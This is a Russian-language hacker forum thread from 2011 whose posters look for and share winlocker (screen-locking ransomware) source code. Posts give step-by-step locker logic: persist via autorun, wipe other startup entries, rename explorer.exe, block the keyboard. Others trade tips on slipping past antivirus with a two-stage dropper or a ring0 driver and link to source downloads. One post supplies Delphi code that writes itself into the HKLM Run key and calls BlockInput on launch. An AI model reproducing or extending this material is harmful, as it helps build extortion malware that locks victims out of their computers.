Исходники Winlocker'a поиск

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by foma9999, 21 Jan 2011.

  1. foma9999

    foma9999 New Member

    Joined:
    5 Jan 2010
    Messages:
    83
    Likes Received:
    2
    Reputations:
    -5
    del
     
    #1 foma9999, 21 Jan 2011
    Last edited: 23 Apr 2019
  2. palmal

    palmal New Member

    Joined:
    23 Jun 2010
    Messages:
    0
    Likes Received:
    3
    Reputations:
    0
    могу предоставить исходники на асме, если взамен доработаешь немного "под меня")
     
  3. wolmer

    wolmer Member

    Joined:
    12 May 2009
    Messages:
    438
    Likes Received:
    97
    Reputations:
    9
    А что тут такого сложного в реализации локера?
    Действия:
    При первом старте локера:
    1. Добавление в автозагрузку своего локера
    2. Удаление всех программ из автозагрузки
    3. Переиминование explorer.exe

    После последующих стартов (т.е. когда должно выводится окно локера при старте системы):
    1. Блочим клавиатуру
    2. Выводим окошко локера
     
    #3 wolmer, 21 Jan 2011
    Last edited: 21 Jan 2011
  4. De-visible

    De-visible [NDC] Network develope c0ders

    Joined:
    6 Jan 2008
    Messages:
    916
    Likes Received:
    550
    Reputations:
    66
    Какой то говняный локер получится...
    Антивирусы и файрволы создавали зря, если все так просто..
     
  5. z0mbyak

    z0mbyak Active Member

    Joined:
    10 Apr 2010
    Messages:
    537
    Likes Received:
    200
    Reputations:
    293
    А ты по поиску поищи все-таки:) может мой найдешь:) на хакхаунд:)
     
  6. yuran666666

    yuran666666 Member

    Joined:
    18 Jan 2009
    Messages:
    84
    Likes Received:
    19
    Reputations:
    11
    а все локеры по-дефолту гавно. Ковыряя их от нефиг делать я видел всего один, который свой старт писал хотя бы в планировщик заданий, а не во всем известные места, но и тот себя инжектил в эксплорер созданием удаленного треда с загрузкой в нем же библиотеки, что также адовое паливо. А вообще не так то и просто обойти параноидально настроенную проактивку файрвола, да.
    А вообщем,
    99% создателей локеров-школьники, причем даже не воинствующие. Все смотрят на них как на гавно(ну то есть так же как смотрятся их творения) и дружно им сочувствуют.
    Для ТС: мой вам скромный совет-не пишите очередное безблагодатное гавно(а раз вы спрашиваете еще и пример написания оного, то, есть мнение, что ничего лучшего у вас и не получится), а займитесь чем-нибудь полезным.
     
  7. 6anzay

    6anzay Member

    Joined:
    30 Nov 2009
    Messages:
    138
    Likes Received:
    28
    Reputations:
    10
    В теме вообще не шарю.
    НО!
    Видел видео урок создания винлокера на делфи
    на рутрекере поищи.
     
  8. ilyhamas

    ilyhamas Banned

    Joined:
    25 Oct 2009
    Messages:
    48
    Likes Received:
    2
    Reputations:
    0
    Вот он http://rutracker.org/forum/viewtopic.php?t=2565952
     
  9. NemTaq

    NemTaq Member

    Joined:
    11 Aug 2010
    Messages:
    115
    Likes Received:
    19
    Reputations:
    14
  10. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Самые нормальный, читабелный, закомментированый на русском это винлокер от d_x, поищи на блоге kaimi: kaimi.ru
     
  11. De-visible

    De-visible [NDC] Network develope c0ders

    Joined:
    6 Jan 2008
    Messages:
    916
    Likes Received:
    550
    Reputations:
    66
    Самые простой, читабелный, закомментированый на русском .......
     
  12. Edward

    Edward Banned

    Joined:
    11 Feb 2010
    Messages:
    329
    Likes Received:
    21
    Reputations:
    -1
    Очень сложно реализовать _нормальный_ винлокер без перехода в в нулевое кольцо.
     
  13. _nic

    _nic Elder - Старейшина

    Joined:
    5 May 2006
    Messages:
    651
    Likes Received:
    54
    Reputations:
    3
    Только начиная с висты
     
  14. slesh

    slesh Elder - Старейшина

    Joined:
    5 Mar 2007
    Messages:
    2,702
    Likes Received:
    1,224
    Reputations:
    455
    ну вот с чего вы всё это взяли? Винлокер можно написать довольно просто. И даже антивири орать не будут особо. конечно некоторые особо угукнутые возмутяться но это не страшно и можно легко обойти. Главное всё делать в 2 ступени а не в одну как любят все
     
  15. winsock

    winsock New Member

    Joined:
    15 Aug 2010
    Messages:
    57
    Likes Received:
    2
    Reputations:
    0
    Главное всё делать в 2 ступени а не в одну как любят все

    что бы это значило ? дроппер что ли ?
     
  16. cheater_man

    cheater_man Member

    Joined:
    13 Nov 2009
    Messages:
    651
    Likes Received:
    44
    Reputations:
    7
    from me=)
    http://forum.antichat.ru/nextnewesttothread185040.html
     
  17. stepashka_

    stepashka_ Мотоциклист

    Joined:
    9 Nov 2009
    Messages:
    1,022
    Likes Received:
    423
    Reputations:
    234
    Code:
    end;
    
    var
      Form1: TForm1;
    procedure BlockInput(ABlockInput: boolean); stdcall; external 'USER32.DLL'; 
    implementation
    procedure ChangeReg(StrName: ShortString; delete: boolean);
    
    var
    
    reg: TRegistry;
    
    begin
    
    Reg := nil;
    
    try
    
    reg := TRegistry.Create;
    
    reg.RootKey := HKEY_LOCAL_MACHINE;
    
    reg.LazyWrite := false;
    
    reg.OpenKey('Software\Microsoft\Windows\CurrentVersion\Run',false);
    
    if not delete then reg.WriteString(StrName, Application.ExeName)
    
    else reg.DeleteValue(StrName);
    
    reg.CloseKey;
    
    reg.free;
    
    except
    
    if Assigned(Reg) then Reg.Free;
    
    end;
    
    end;
    
    {$R *.dfm}
    
    
    procedure TForm1.FormActivate(Sender: TObject);
    begin
    BlockInput(True);
    end;
    
    procedure TForm1.AddBtnClick(Sender: TObject);
    begin
    
    ChangeReg('My App',false); //добавляем в Автозагрузку
    
    end;
    Я вот так делал.. работало. :)
     
  18. yfet

    yfet Banned

    Joined:
    11 Jul 2009
    Messages:
    48
    Likes Received:
    19
    Reputations:
    5
    тс стукни мне в асю 934782 после 22 по мск, я тебе скину на делфях исходники
     
  19. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Эм, ну не думаю что можно где-то найти в паблике винлокер со своим драйвером для перехода в ринг0 путем выгрузки другого драйвера и запуск _своего_ драйвера с именем выгруженного =)

    Исходники можно посмотреть только если посмотреть по каким принципам работает, куда в реестре прописывается, как блокирует все кроме самого себя и т.д., а все остальное самопис с наработками до такого вида, как я описал выше =)

    P.S.:
    Не считаю я что такое надо на Дельфи писать. Не раздувайте холиваров, это просто мое мнение =) Либо чистый АСМ, либо С++ с АСМ вставками...
     
    #19 Tigger, 22 Jan 2011
    Last edited: 22 Jan 2011
  20. De-visible

    De-visible [NDC] Network develope c0ders

    Joined:
    6 Jan 2008
    Messages:
    916
    Likes Received:
    550
    Reputations:
    66
    Ну вообще, способы лучше существуют, много про них я слышал от Грейта, Кез помоему тоже рассказывал, я там даже многое не вдупляю)).
    На делфи можно писать, но если без VCL, WinAPi. Вон slesh на дельфах чудеса творит, используя WinApi. А так по сути есстественно С++ для таких дел самое то.